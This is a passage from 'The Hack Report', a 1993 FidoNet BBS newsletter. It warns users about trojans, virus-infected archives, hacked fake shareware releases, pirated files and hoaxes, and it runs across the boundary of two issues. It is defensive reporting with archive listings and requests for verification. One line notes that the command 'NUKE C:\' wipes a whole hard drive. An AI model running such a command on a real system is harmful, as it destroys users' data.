  list it in the Trojan Wars section, so please advise if you have any.

  HW Emanuel Levy says the file IM, reported by Michael Santos in the
  Intelec Net Chat conference and listed in the 1992 Full Archive edition
  of The Hack Report.  Michael's report was a "hearsay" report from one of
  his friends, and stated that the IM screen saver file caused a viral
  infection.

  Emanuel says the file is an "outer space screen saver," currently under
  the filename IM17.  Scott Wunsch (1:140/23.1701) says the program name is
  "Inner Mission," and he currently has version 1.6.  In both cases, the
  files were clean.

  So, it looks like either Michael's friend's system became infected from a
  different source than the IM file, or that an isolated incident of an
  infected IM is involved.  No way to tell at this writing.

  Long time readers of this report will remember a question concerning the
  status of a screen saver called TUNNEL.  Ove Lorentzon (2:203/403.6) and
  Bill Roark (RIME address BOREALIS, Shareware conference, via HW Richard
  Steiner) both stated that the program was an internal IBM test program
  and was not intended for outside distribution.

  Your Hack Squad has received word from the author of the program, Dan
  Butterfield (Internet, danielb@vnet.ibm.com), that as far as he is aware,
  the program has never been released to the general public.  According to
  Dan, "it is still owned by IBM, and as such has been given the IBM
  security classification 'IBM Internal Use Only' which means what it says:
  the program is not for distribution to non-IBM employees."

  Dan also says that several other "Internal Use Only" programs have been
  "leaked" to the outside world, which implies that these files should not
  be posted for download.  One such program was originally called Dazzle
  (NOT to be confused with the other popular DAZZLE screensaver), but has
  entered BBS distribution under the filename O-MY-GOD (also seen as OMG,
  per Michael Burkhart (RIME address CENTER, via HW Richard Steiner).
  However, note that the O-MY-GOD/OMG file was hacked, according to Dan, so
  that all of the "Internal Use Only" references were removed.

  Another is a program that is usually included inside other archives:  the
  program name is PLAYANI.  Dan says this has been distributed "along with
  various animations," and also falls under the same Internal
  classification.

  A prime example of this is an archive called BALLS (not what you think).
  This is an animation of multiple chrome spheres rotating around each
  other above a red and white checkerboard platform.  In this case, both
  the player (PLAYANI) _and_ the animation are the property of IBM and are
  not intended for BBS distribution.

  Again, to quote Dan, "None of these programs are for external
  distribution; all are owned by IBM and are only for use inside IBM by IBM
  employees."  Thanks to Dan for all of his help.

  Donn Bly has cleared up the question on the status of the Sydex program
  TeleDisk, first raised by Mark Draconis (1:120/324) and Kelvin Lawson.
  Donn was kind enough to mail a copy of a letter sent to him by Sydex
  explaining that Teledisk is no longer shareware.  Here is an excerpt from
  the letter:

       "Effective April 1991, TeleDisk is no longer a shareware
       product.  After long consideration, we decided to
       discontinue our offering of the shareware edition of
       TeleDisk, and license it only as a commercial product.

       "Commercial licenses of TeleDisk are available from Sydex at
       $150 a copy.  All shareware distributors and BBS sysops who
       take time to check their sources are requested to remove
       TeleDisk from shareware distribution."

  The letter is signed by Miriam St. Clair for Sydex.  To summarize, Sydex
  is no longer accepting shareware registrations for TeleDisk, and asks
  that it be not be made available for download from BBS systems.

  Thanks to Donn for his help in this matter.

  HW Ken Whiton forwards messages from Harold Stein, Gary Rambo, and Gwen
  Barnes of Mustang Software, Inc., about a "patch" program aimed at
  OffLine Xpress (OLX) v1.0.  The patch is supposed to allow OLX to
  read and reply to Blue Wave packets, along with a lot of other seemingly
  unbelievable feats.  Gwen Barnes did not seem to know of the patch, but
  published the following advice in the WildNet SLMROLX conference to
  anyone considering trying it:

    1. Make a complete backup of your system.
    2. Make sure you've got all the latest SCAN stuff from McAfee
    3. Try it, keeping in mind that it more than likely does nothing
       at all, or is a trojan that will hose your system.
    4. Get ready to re-format and restore from backups if this is in
       fact the case.

  No filename was given for this patch.  If anyone runs across a copy of
  it, please contact one of The HackWatchers or myself so that we can
  forward a copy to MSI for testing.

  HW Bill Lambdin reports that someone has taken all of McAfee Associates'
  antiviral programs and combined them into one gigantic (over 700k)
  archive.  He did not say whether the files had been tampered with, but he
  did send a copy to McAfee for them to dissect.  The file was posted under
  the filename MCAFEE99.  I would not suggest downloading this file:  as a
  matter of fact, this reporter prefers to call McAfee's BBS directly when
  a new version of any of their utilities comes out.  I highly recommend
  this method, since it insures that you will receive an official copy.

  HW Matt Kracht forwarded a message from Stu Turk in the DR_DEBUG
  echo about possible Trojans going around as PKZIP 2.21 and/or 2.22.  Stu
  also says that there is a warning about these in circulation.  If you
  have a copy of this warning, please send a copy to Hack Central Station
  (1:124/4007).

  =========================================================================

                            Information, Please

  This the section of The Hack Report, where your Hack Squad asks for
  _your_ help.  Several reports come in every week, and there aren't enough
  hours in the day (or fingers for the keyboards) to verify them all.  Only
  with help from all of you can The Hack Report stay on top of all of the
  weirdness going on out there in BBSLand.  So, if you have any leads on
  any of the files shown below, please send it in: operators are standing
  by.

| Chuck Hammock (1:392/20) reported in the FidoNet DIRTY_DOZEN echo that
| one of his users uploaded a file called PASTUT24.  The user warned Chuck
| that this file was infected with the Kamikazee virus.  I was unable to
| get further information on this, so Chuck, if you are reading this (or if
| anyone else can confirm this), please send me some NetMail on your
| results.

| Russell Wagner reported a problem with a copy of VMIX222.  This shareware
| multitasker is currently at v2.87.  Russell claims to have found a
| possible isolated incident of a Trojan version of the program.  He wound
| up scrambling the FAT on his C: drive when he ran the program, and was
| able to reproduce the damage in subsequent tests.  He only ran the
| program on one system, however, so it is not clear as to whether he has
| found a true Trojan claiming to be the real VMiX, a corrupted copy of the
| file, or whether he has some sort of hardware incompatibility.  If anyone
| else has run into a problem with v2.22 of this program, please advise.

  Robert Rothenburg (Internet robert.rothenburg@asb.com) received a file
  called JAMMER that he says is very suspicious.  The archive had a file
  with the name JAMMER.EXE and a description that said something to the
  effect of, "run this first and your calls won't be traced."

  He looked through the executable and found the name "Nmodem Jammer 2.8",
  along with "some other claims about adjusting the modem configuration"
  and "some nasty insults to a couple of people."  Virus scanners showed
  nothing, so he looked at the interrupts.  He says it "looks like it
  installs a TSR of sorts and does some disk writes."  He concludes that
  the file possibly "instals a virus or just damages certain files, though
  i suspect it will go after the comm program, as a message says when it
  ends to 'run your communications program now!'".

  I am attempting to get a copy of this from Robert for further testing -
  please be on the lookout for a copy, and notify your local HackWatcher or
  myself if you see it.

  Jim Tinlin (1:206/2604) brought into question a file called CRAPS, which
  looks like a shareware Craps game for Windows.  However, a line inside
  the internal README.TXT file reads as follows:

      "As a licensed owner, please do not distribute this copy to others"

  To further confuse matters, the game displays an opening screen that
  states it is indeed shareware and should be distributed.  The file
  contents are as follows:

        CRAPS    EXE    264007 05-13-93   9:05aC
        CRAPS    HLP     40043 04-12-93   7:16aC
        README   TXT      5322 04-12-93   7:02aR
                5 file(s)     309372 bytes

  This is another one that makes us scratch our heads here at Hack Central
  Station.  Any information would be appreciated.

  HW Bob Seaborn forwarded a message from Kevin Haverstock (via Tom Scott,
  1:140/47) about a file called TCM_V511.  This was described as "The
  Configuration Manager," a system configuration utility.  Kevin's report
  said that once you finish running the setup, your computer reboots and
  you get a prompt that "scrolls your screen and locks up your system."  He
  was unable to access his hard drive after booting from a system disk - a
  reformat was required.

  I am familiar with a legitimate shareware program called The
  Configuration Manager, but not under version number 5.11, nor under the
  above filename.  I can't be sure if Kevin's problems were the result of a
  hardware error, user error, or an isolated incident of a tampered
  archive.  If anyone has any information on what could have caused this,
  please enlighten me.

  Harold Stein (1:107/236) found a file called STETRIS, claiming to be a
  Super Tetris game.  He says that there was a shareware version of this
  that was released about a year ago, but has since been renamed due to a
  conflict with a commercial game of the same name.  He is not sure whether
  or not he found the old shareware file or a pirated copy of the
  commercial file.  The archive (in .zip format, presumably using v2.04g)
  was 55,318 bytes long, and the archive date had been "touched" by the BBS
  it was uploaded to, forcing it to March 23, 1993 (Editorial: this renders
  filedates rather useless, IMHO. -lj)

  Based on further information from Jeff Hancock (1:3600/7), it seems now
  that Harold may have either an older shareware version, an incomplete
  archive, or a different program altogether.  Jeff's copy of the shareware
  version was only 47480 bytes (compressed with ARJ).  He has seen the
  commercial game, and says it is "MUCH larger".  With this information, I
  consider the matter closed.  Thanks to Jeff for his help.

  Peter Hempel (1:229/15) posted a message in the FidoNet Echo VIRUS about
  the file BREAKIT!, which was described as follows:

  BREAKIT!.ZIP  6714  03-29-93  (CRS) A Gw-Basic Code And Cipher Program
                                Allowing You To Enter Ascii Characters, To
                                Save Them, And To Encode And Decode.

  Peter claims that this program erased his root directory, but says he was
  able to recover everything by booting from a write-protected system disk
  and using the Norton Utilities UNERASE command.  The archive contents are
  as follows:

   Name         Original Method     Packed CR%   Date     Time   CRC
   ============ ======== ======== ======== === ======== ======== ========
   BREAKIT!.BAS     4453 Implode      2604  58  1-24-93 11:25:24 42CA0CE4
   CODEFILE.FIL     1240 Implode       550  44  3-28-92 10:52:44 B6ADEB20
   PRINTME.BAT        31 Stored         31 100  1-24-93 11:54:12 965CF8AE
   VIEW.COM          958 Implode       876  91  3-19-92 19:11:46 47C5E5EF
   README.BAT         30 Stored         30 100  1-24-93 11:52:32 95294A43
   BRK.BAT            40 Stored         40 100  1-24-93 11:53:32 FC9F3B2E
   BREAKIT!.DOC     2679 Implode      1440  54  1-24-93 11:56:06 EC302AFA
   ============ ======== ======== ======== === ======== ======== ========
          7         9431 ZIP          5571  59  1-24-93 11:56:06

  He did not say which file did the damage.  I do not know if this is a
  Trojan or an infected file - in either case, it may well be an isolated
  incident.  Test results would be greatly appreciated.

  Lowell Shatraw (1:315/6) states that there may be two pirated commercial
  fax programs floating around under the filenames FAX and PC_FAX.  The
  archives he reported on were in ARJ format and were 447,693 and 101,089
  bytes long, respectively.  The file dates were Dec. 4, 1992, and May 26,
  1992 - no way to tell if the BBS "touched" the filedates.  Lowell is also
  not sure which commercial products these may be.  If you happen to run
  across one or both of these, please look inside them - if they are
  commercial, please let me know (after you delete your copies, of course!
  <g>).

  A message from Tony Lim (1:120/314, forwarded by Jack Cross, 1:3805/13)
  states that he had a user upload a file called TAG-NFO, which turned out
  to be a Trojan.  No details about the Trojan were given, so any
  confirmation of this would be appreciated.

  HW Bill Lambdin forwards a message from Mario Giordani in the ILink Virus
  Conference about two files.  The archives, called PHOTON and NUKE, are
  possibly droppers, containing a file called NUKE.COM which "will trash
  your HD."

  Pat Finnerty (1:3627/107) sent a reply to the last report of this,
  stating that he has a copy of a PC Magazine utility called NUKE.COM,
  which is used to remove subdirectories which contain "nested subs,
  hidden, read-only (you name it)."  He says that the command NUKE C:\ will
  effectively delete everything on a hard drive, with no chance of repair.
  This is merely the way the program is designed.

  I do not know if this is what happened in Mario's case, or if Mario
  actually found a copy (read: isolated incident) which was infected. Bill
  has asked Mario for further information, and I would like to echo his
  call for help.  If you know of this, please lend a hand.

  Ned Allison (1:203/1102) forwarded a report into the FidoNet DIRTY_DOZEN
  echo from a user of The Mailbox BBS in Cleveland (216/671-7534) named
  Rich Bongiovanni.  Rich reports that there is a file floating around
  called DEMON WARS (archive name DMNWAR52) that is "infected with a
  virus."  If true, this may be an isolated incident.  I would appreciate
  confirmation on this.

  Greg Walters (1:270/612) reports a possible isolated incident of a
  problem with #1KEEN7.  When he ran the installation, he began seeing on
  his monitor "what looked like an X-rated GIF."  The file apparently
  scanned clean.  Any information on similar sightings would be
  appreciated.

  A report from Todd Clayton (1:259/210) concerns a program called
  ROBO.EXE, which he says claims to apparently "make RoboBoard run 300%
  faster."  He says he has heard that the program fools around with your
  File Allocation Table.  I have not heard any other reports of this, so I
  would appreciate some confirmation from someone else who has seen similar
  reports.

  Kelvin Lawson (2:258/71) posted a message in the SHAREWRE echo about a
  possible hack of FEBBS called F192HACK.  I have not seen this file, nor
  has the author of FEBBS, Patrik Sjoberg (2:205/208).  He forwards the
  file sizes in the archive, reported here:

        Name          Length      Mod Date  Time     CRC
        ============  ========    ========= ======== ========
        FEBBS.EXE       220841    09 Mar 92 21:17:00 96D2E08D
        014734.TXT        1403    26 Aug 92 01:59:18 3B9F717F
        ============  ========    ========= ======== ========
        *total     2    222244    26 Aug 92 01:59:24

  Kelvin says the .TXT file is just an advert for a BBS, so it is "not
  relevant!".  As I said, the author of FEBBS has never seen this file, so
  I've asked Kelvin to forward a copy of it to him.

  Andrew Owens (3:690/333.11) forwarded a report of a "Maximus BBS
  Optimiser," going under the filenames MAX-XD and MAXXD20. Scott Dudley,
  the author of Maximus, says he did not write any programs that have these
  names, but he does not know whether they are or are not legitimate third
  party utilities.  I have requested further information from Andrew on
  this topic, and would appreciate anyone else's information, if they have
  any.

  Yet another short warning comes from David Bell (1:280/315), posted in
  the FidoNet SHAREWRE echo, about a file called PCPLSTD2.  All he says is
  that it is a Trojan, and that he got his information from another
  "billboard" and is merely passing it on.  Again, please help if you know
  what is going on here.

  A message in the FidoNet ASIAN_LINK echo from Choon Hwee (1:3603/263)
  grabbed my attention the moment I saw it: in capital letters, it said,
  "DO NOT RUN this file called MODTEXT.EXE, cause it is a TROJAN!!!".  He
  goes on to say that two BBSs have been destroyed by the file.  However,
  that's about all that was reported.  I really need more to go on before I
  can classify this as a Trojan and not just a false alarm (i.e., archive
  name, what it does, etc.).  Please advise.

| Greg Mills (1:16/390) posted a question to Robert Jung in the ARJ Support
| Echo (FidoNet) about a version of ARJ called 2.33.  It was unclear as to
| whether or not Mr.  Mills had seen the file.  Mr. Jung has stated that
| this is not a legitimate release number.  It is possible that the
| references Greg saw about 2.33 were typos, but you never know.  Please
| help your Hack Squad out on this one - if you see it, report it.

  =========================================================================

                           The Meier/Morlan List

| Here is the current status of the files contained in the Meier/Morlan
| List.  This is the last month for requests for information on this part
| of The Hack Report, as I have placed a deadline of September 30th on the
| files in this list.  They've been reported for quite some while now, and
| the verifications have slowed to a trickle.  If the files listed below
| can't be verified in time for the October issue, I will need to write
| them off as false alarms.

            === Previous comments on the files in the list: ===

  Shane Paul of Softdisk Publishing (RIME, via HW Richard Steiner),
  comments on the SLORDAX game:

    "If the SLORDAX game if by Gamer's Edge and copyrighted by Softdisk
     then it is a pirated copy."

  I can't be sure that this is the case, so the file stays on the list
  until someone can verify this.

  Lee Madajczyk (1:280/5) surmises that HARRIER could be Harrier Combat
  Simulator by Mindscape, Inc.  He says that he hasn't seen anything from
  them in quite a while, and doesn't know if the company is still in
  business.

  Here are the remaining unresolved reports from HW Emanuel Levy:

  "387DX  - sounds like a Math Co-Processor emulator - might be legit

  "Barkeep sounds like it may be a version of Tapper. If you send beer mugs
  down the screen to patrons and then have to pick up the returning mugs
  and they leave tips, then it is Tapper. Or it may be an OLD game
  published in Compute Mag. If it is the one from Compute only those who
  have the Compute issue with the game in it are allowed to have a copy.

  "Harrier is either Harrier Jiump Jet or Space Harrier from Sega wich came
  out for the Commodore 64 in 89 so I would assume it came out for IBM
  around then too.

  "Gremlins- There was an Gremlins Text Adventure and a Video Came for the
  computer. The video game was put out by Atari

  Thanks, Emanuel.

  For those who have missed it before, here is what is left of the list of
  files forwarded by Joe Morlan (1:125/28), as compiled by Wes Meier, SysOp
  of the WCBBS (1-510-937-0156) and author of the AUNTIE BBS system.  Joe
  says Wes keeps a bulletin of all rejected files uploaded to him and the
  reasons they were rejected.  Joe also says he cannot confirm or deny the
  status of any of the files on the list.

  There are some that I am not familiar with or cannot confirm.  These are
  listed below, along with the description from Wes Meier's list.

  Due to the unconfirmed nature of the files below, the filenames are not
  included in the HACK????.COL and HACK????.IDX files that are a part of
  the archive of The Hack Report.  I would appreciate any help that
  anyone can offer in verifying the status of these files.  Until I receive
  verification on them, I will not count them as either hacks or pirated
  files.  Remember - innocent until proven guilty.

  My thanks go to Joe and Wes for their help.

        Filename  Reason for Rejection
        ========  =============================================
        BARKEEP   Too old, no docs and copyrighted with no copy
                  permission.
        HARRIER   Copyrighted.  No permission to copy granted.
        SLORGAME  Copyrighted.  No docs.  No permission to copy
                  granted.
        NOVELL    Copyrighted material with no permission to
                  BBS distribute
        DRUMS     I have no idea if these are legit or not.  No
                  docs.
        GREMLINS  No documantation or permission to copy given.
        CLOUDKM   A hacked commercial program.
        MENACE    Copyrighted.  No docs.  No permission to copy
                  granted.
        SNOOPY    Copyrighted.  No docs.  No permission to
                  copy granted.
        SLORDAX   Copyrighted.  No docs.  No permission to
                  copy granted.
        ESCAPE    Copyrighted.  No docs.  No permission to
                  copy granted.
        BANNER    Copyrighted.  No docs.  No permission to
                  copy granted.
        387DX     Copyrighted.  No docs or permission to
                  copy granted.
        WINDRV    Copyrighted.  No permission to copy granted.

  =========================================================================

                                  Help!!!

  Would the person who sent the copy of Vegas Casino 2 (filename VEGAS2) to
  The Hack Squad for testing/verification please re-identify themselves via
  NetMail?  Somehow, your message went to the great Bit Bucket in the sky.
  Thanks in advance!

  =========================================================================

                         Clarifications and Thanks

  Folks, the LHA mystery has finally been resolved, thanks to Scott Fell
  (1:124/6119), Steve Quarrella (1:124/9005), and Kenjirou Okubo, the
  support person for LHA.  Your Hack Squad finally received the Internet
  address for Kenjirou Okubo (kenjirou@mathdent.im.uec.ac.jp), and managed
  to verify Scott Fell's own contact, relayed via Steve.

  If you recall, Onno Tesink (2:283/318) found a file called LHA255B.  This
  claims to be version 2.55b of the LHA archiver, with a file date in the
  executable of 12/08/92.  Onno's report was the one that started the
  search.

  Kenjirou knew of this version and verified its legitimacy.  He also
  provided some other very helpful information, which is best relayed by
  quoting his message to me:

       "For DOS, currently lha256a1 is under testing in a closed
       circle for networking environment. After LHA213, dos5 appeared
       in Japan and Yoshi started his series LHA25x series. The two
       versions you mentioned seem to fall under this series. The
       latest version which might be distributed by me is LHA254 for
       people who wants to test -lh6- algorithm."

  He went on to provide the following information on how to verify your
  copy of LHA:

       "Any version ending with LHA25xb is a beta test version, and
       LHA25xa is for a limited circulation. To test whether these
       files are legitimate release either from Yoshi or me, please
       use -t option to check two dimensional CRC self-validation
       check. We believe our test will check the validation with
       10E-38 % of error probability."

  From my own testing, here is the best way to run the verification:

    1.  Extract LHA.EXE from the suspect archive and place it in an
        empty subdirectory that is not on your path.  (example:
        c:\foo\lha.exe).

    2.  Change directories to the one which contains a known good copy
        of LHA.EXE.

    3.  Execute the command LHA t drive:\path\LHA.EXE.  Using the above
        example, your command line would look like this:

                C:\LHADIR>LHA t C:\FOO\LHA.EXE

  This will execute the known good copy of lha, which will test the suspect
  copy and report whether or not the file "appears" to be the original or
  not.  Even though the older LHA is doing the testing, it will be able to
  verify the newer copy.

  Please note that Scott Fell's information was that the author does not
  want these copies distributed.  However, it seems that the folks working
  on LHA are aware that some betas have "escaped" into circulation.  In
  other words, use any betas _entirely_ at your own risk.

  Scott and Steve have my undying gratitude for helping to lay this to
  rest, most notably by locating Kenjirou's Internet address and following
  through on it.  Thanks from all of us!

  *************************************************************************

                                Conclusion

  If you see one of the listed files on a board near you, it would be a
  very friendly gesture to let the SysOp know.  Remember, in the case of
  pirated files, they can get in just as much trouble as the fiend who
  uploads pirated files, so help them out if you can.

                          ***HACK SQUAD POLICY***

  The intent of this report is to help SysOps and Users to identify
  fraudulent files.  To this extent, I give credit to the reporter of a
  confirmed hack.  On this same note, I do _not_ intend to "go after" any
  BBS SysOps who have these programs posted for d/l.  The Shareware World
  operates best when everyone works together, so it would be
  counter-productive to "rat" on anyone who has such a file on their board.
  Like I said, my intent is to help, not harm.  SysOps are strongly
  encouraged to read this report and remove all files listed as "confirmed"
  from their boards.  I can not and will not take any "enforcement action"
  on this, but you never know who else may be calling your board.  Pirated
  commercial software posted for d/l can get you into _deeply_ serious
  trouble with certain authorities.

  Updates of programs listed in this report need verification.  It is
  unfortunate that anyone who downloads a file must be paranoid about its
  legitimacy.  Call me a crusader, but I'd really like to see the day that
  this is no longer true.  Until then, if you _know_ of a new official
  version of a program listed here, please help me verify it.

  On the same token, hacks need to be verified, too.  I won't be held
  responsible for falsely accusing the real thing of being a fraud.  So,
  innocent until proven guilty, but unofficial until verified.

  Upcoming official releases will not be included or announced in this
  report.  It is this Moderator's personal opinion that the hype
  surrounding a pending release leads to hacks and Trojans, which is
  exactly the opposite of what I'm trying to accomplish here.

  If you know of any other programs that are hacks, bogus, jokes, hoaxes,
  etc., please let me know.  Thanks for helping to keep shareware clean!

                   Lee Jackson, Author, The Hack Report
     Moderator, FidoNet Int'l Echos SHAREWRE and WARNINGS (1:124/4007)

The Hack Report Volume 2, Number 4 (April 4, 1993)

  =========================================================================
                                    ||
  From the files of The Hack Squad: ||  by Lee Jackson, Co-Moderator,
                                    ||  FidoNet International Echo SHAREWRE
          The Hack Report           ||  Volume 2, Number 4
          for April, 1993           ||  Report Date: April 4, 1993
                                    ||
  =========================================================================

  Welcome to the fourth 1993 issue of The Hack Report.  This is a series of
  reports that aim to help all users of files found on BBSs avoid
  fraudulent programs, and is presented as a free public service by the
  FidoNet International Shareware Echo and the author of the report, Lee
  Jackson (FidoNet 1:382/95).

  This month's issue was delayed a bit, due to some severe weather in the
  area of Hack Central Station.  However, and I hope you'll agree with me,
  the wait was worth it:  more ARJ hacks have appeared, seemingly in
  anticipation of a new release of the popular archiver, and the Power Pump
  is sighted once again.  Also, in what seems to be a never-ending attack
  against a well-known program, someone has released yet another tampered
  archive of TheDraw.  Thanks to everyone who has helped put this report
  together, and to those that have sent in comments and suggestions.

  NOTE TO SYSOPS: The Hack Report may be freely posted as a bulletin on
  your BBS, subject to these conditions:

             1) the latest version is used,
             2) it is posted in its entirety, and
             3) it is not altered in any way.

  NOTE TO OTHER READERS: The Hack Report (file version) may be freely
  uploaded to any BBS, subject to the above conditions, and only if you do
  not change the filename.  You may convert the archive type as you wish,
  but please leave the filename in its original HACK????.* format.  The
  Hack Report may also be cross-posted in other networks (with the
  permission of the other network) as long as it meets the above conditions
  and you give appropriate credit to the FidoNet International Shareware
  Echo (and the author <g>).

  The idea is to make this information available freely.  However, please
  don't cut out the disclaimers and other information if you use it, or
  confuse the issue by spreading the file under different names.  Thanks!

  DISCLAIMER: The listings of Official Versions are not a guarantee of the
  files' safety or fitness for use.  Someone out there might just be
  sick-minded enough to upload a Trojan with an "official" file name, so
  >scan everything you download<!!!  The author of this report will not be
  responsible for any damage to any system caused by the programs listed as
  Official Versions, or by anything using the name of an Official Version.

| In addition, the releases listed as the latest Official Versions may not
| be entirely accurate.  However, they do reflect the latest version known
| to the author of The Hack Report at the time of writing.  That's the
| nature of the beast we call shareware:  authors have every right (and in
| this writer's opinion, are well advised) to release a new version without
| advance notice of any kind.  If you see a version newer than one listed
| here, please contact one of The HackWatchers or myself so that we can
| keep these listings up to date.

  *************************************************************************

                              Hacked Programs

| Here are the latest known versions of some programs known to have hacked
| copies floating around.  Archive names are listed when known, along with
| the person who reported the fraud (thanks from us all!).

   Program              Hack(s)                    Latest Official Version
   =======              =======                    =======================
|  ARJ Archiver         ARJ250                     ARJ239D
      Reported By:  Tommy Vielkanowitz(1:151/2305)
|                       ARJ239E
|     Reported By:  The Hack Squad
                        ARJ240A
      Reported By:  Ryan Shaw (1:152/38)

   Blue Wave Offline    BWAVE_3                    BWAVE212
    Mail Reader
      Reported By: HW Scott Raymond

   BNU FOSSIL Driver    BNU202                     BNU170
      Reported By: Amauty Lambrecht (2:291/712)    (not counting betas)
                        BNU188B
      Reported By: David Nugent (3:632/348),
                      Author of BNU

   DMS Amiga Disk       DMS version 1.12           DMS version 1.11
    Masher
      Reported By: Ben Filips, via Jay Ruyle (1:377/31)

   F-Prot Virus Scanner FP-205B                    FP-207
      Reported By: HW Bill Lambdin

   LhA Amiga Archiver   LHA148E                    LHA138E (Shareware)
      Reported By: Michael Arends (1:343/54)       LHA v1.50r (Regist.)
                        LHA151
      Reported By: Lawrence Chen (1:134/3002)

   MusicPlay            MPLAY31                    MPLAY25B
      Reported By: Lee Madajczyk (1:280/5)

   PKLite               PKLTE201                   PKL115
      Reported By: Wen-Chung Wu (1:102/342)

   PKZip                PKZ301                     PKZ204G
      Reported By: Mark Dudley (1:3612/601)
                   Jon Grimes (1:104/332)

   Shez                 SHEZ72A                    SHEZ89
                        SHEZ73
      Reported By: HW Bill Lambdin

|  Telemate             TM40C                      TM400-1 through 4
|     Reported By: Philip Dynes, RIME Telemate
|                  conference, via HW Richard
|                  Steiner
|                       TM410-1
|     Reported By: Bat Lang (1:382/91)

|  Telix                Telix v3.20                TLX321-1
|                        (Prior to Dec. 1992)      TLX321-2
|                       Telix v3.25                TLX321-3
|     Reported By: Brian C. Blad (1:114/107)       TLX321-4
                   Peter Kirn (WildNet, via HW Ken Whiton)
                        Telix v4.00
                        Telix v4.15
      Reported By: Barry Bryan (1:370/70)
                        Telix v4.25
      Reported By: Daniel Zuck (2:247/30, via Chris
                    Lueders (2:241/5306.1)
                        MegaTelix
      Verified By: Jeff Woods, deltaComm, Inc.
                        Telix Pro
      Reported By: Jason Engebretson (1:114/36),
                   in the FidoNet TELIX echo

   Wolfenstein-3D       WOLF2-1                    #1WOLF14
                        WOLF2-2
      Reported By: Wen-Chung Wu (1:102/342)

  =========================================================================

                                Hoax Alert:

| Recently, an archive of Frisk's (a.k.a. Fridrik Skulason's) F-Prot Virus
| Scanner v2.07 has been distributed with a "registration form" from a
| company called JLT.  According to Frisk, this is not legitimate.  He says
| that JLT contacted him in the fall of 1992, asking if they could
| distribute F-Prot, collect registration fees, and forward 50% of the fees
| to him.  Frisk didn't want them to do this, but it appears that an
| archive with the "registration form" may have slipped into distribution.
| In Frisk's words, "...this version is most certainly not something that I
| want distributed."

  From the "Not Really A Program, but Interesting Anyway" department, a
  "press release" has entered distribution, claiming that PKWare Inc. has
  filed for Chapter 11 bankruptcy.  The letter is dated Friday, February
  26, 1993, and supposedly quotes Mark Gresbach of PKWare in the statement.

  However, in a message posted in the CompuServe PKWARE forum on March 1,
  1993, PKWare employee Douglas Hay states that this is not true.  Douglas
  also points out that the perpetrator of the hoax misspelled the word
  Milwaukee (as 'Milwaukie'), and that one of the three phone numbers in
  the message for PKWare is wrong.  In short, ignore the letter - PKWare
  has _not_ filed bankruptcy.

  Other previously reported hoaxes:

  Filename      Claimed use/Actual activity/Reporter(s)
  ============  ==========================================================
  PKZ305        Hacked "new version" of PKZip.  However, a message in wide
                circulation claimed this was infected with a virus called
                PROTO-T.  This message is the actual hoax:  there may be
                one or more PROTO-T viruses around now, but none do what
                was claimed in the hoax message.  This hack, PKZ305, was
                not infected with any virus, nor did it contain Trojan
                code, per testing by Bill Logan (1:300/22), HW Jeff White,
                and HW Bill Lambdin.

  RAOPT         "Optimizes" your RemoteAccess BBS files and claims to be
                from Continental Software.  Actually does nothing but read
                your USERS.BBS file and report the number of users.  The
                program is _not_ from Continental Software, according to
                Andrew Milner.  Reported by Kai Sundren (2:201/150), via
                HW Mikael Winterkvist.

  SCORCHV2      Claims to be v2.0 of the game Scorched Earth:  this version
                doesn't yet exist.  Actually a renamed archive of version
                1.2.  Reported by Brian Dhatt (1:3648/2.5).

  =========================================================================

                              The Trojan Wars

  The usual "multitude" of Trojans that usually pass through the gates here
  at Hack Central Station was a bit smaller than some months.  However, the
  ones that did come through were enough to make life interesting.  So,
  grab some loaves and fishes, just in case, and read on.

| Ryan Tucker (1:290/10) forwards a message from a fellow SysOp, Robert
| Pedersen, about ASM2PAS.  This claims to create Pascal source code from
| an .EXE file.  However, from text inside the executable, it appears that
| this program tries to delete your DOS directory.  It also brags about a
| certain anti-viral scanner not being able to detect it.
|
| Valid point, that:  practically _no_ anti-viral tools detect Trojans,
| with the exception of Frisk's F-Prot and one or two others.  Even then,
| the Trojan detection is not complete.  Your best protection against
| Trojans is a religiously maintained set of backups, preferably done after
| a check for viruses on your hard drive(s).

| HW Richard Steiner forwarded a message from the America OnLine GEOWORKS
| forum about the file GEOCOMM.  The message, from "GW Steve" (a "GeoRep",
| according to Richard), came from a user of GeoComm named J. S. James, and
| warned that this archive contains a hacked version of the original
| GeoComm program.  The file claims to be an "update," but it seems to be a
| Trojan which will damage your File Allocation Table (FAT).  Not a file to
| be kept around, it would seem.

| HW Bill Lambdin reports on LAW22 (no description), which contains the
| following files:
|
|      Length    Date    Time    CRC-32  Attr  Name
|      ------    ----    ----   -------- ----  ----
|       22911  02-24-93  14:13  a4b84cc7 --w-  ABOUT.COM
|       13422  02-24-93  14:44  8f0d1e96 --w-  INFO.EXE
|         126  02-24-93  14:50  68c9463a --w-  DESC.SDI
|      ------                                  -------
|       36459                                        3
|
| Bill says that ABOUT.COM contains a virus. Scan 102 labels it as BA101,
| which is a 160 byte-long .COM file infector.  This could be an isolated
| incident of an infected legitimate file, so thoroughly check any such
| file you find that has the above files in it before you kill it.

| Another report from Mr. Lambdin concerns a file that a user in the
| Intelec PC-Security conference sent to him, called PCS204 (PC-Sentry
| v2.04).  Bill's tests show that this copy of the archive contains two
| files, INSTALSW.COM and EVERYDAY.COM, that are infected with a
| non-resident "companion" virus that utilizes the Mutation Engine.  It
| also contains the file PCS.EXE, which is infected with a virus created by
| a virus-writing group's "Mass Produce Code Generator."

| Bill also reports that our old friend, the Power Pump virus, has
| resurfaced inside a file called FX2.  Here's the archive info:
|
|               Length   Date    Time    CRC-32  Attr  Name
|               ------   ----    ----   -------- ----  ----
|                25846 01-01-92  00:00  2635e28a --w-  FX2.EXE
|                 1199 01-01-92  00:00  f61885bd --w-  FX2.COM
|                17354 01-01-92  00:00  02eac55c --w-  POWER.EXE
|                 1007 01-01-92  00:00  139e1291 --w-  FX2.DOC
|               ------                                 -------
|                45406                                       4
|
| The giveaway here is the file POWER.EXE.  For a full documentation of the
| Power Pump virus, please see the 1992 Full Archive Edition of The Hack
| Report (filename HACK92FA), available from most official distribution
| sites.

| Travis Griggs (1:3807/8) forwarded a report from a local board called The
| Forum (phone number 1-318-528-2107) by a user named Susan Pilgreen. The
| message referred to a file called BOUNCE, which she said was infected
| with the Beeper (Russian Mirror) virus.  The file, according to Travis,
| claimed to be a game.  Travis has now forwarded the file information on
| this archive:
|
|     Filename       Original DateTime modified CRC-32   Attr BTPMGVX
|     ------------ ---------- ----------------- -------- ----------
|     BOUNCE.COM         4053 80-01-01 00:02:04 35C562AF A--W B 1
|     BOUNCE.DAT       119101 92-11-20 23:16:10 247712A8 A--W B 0
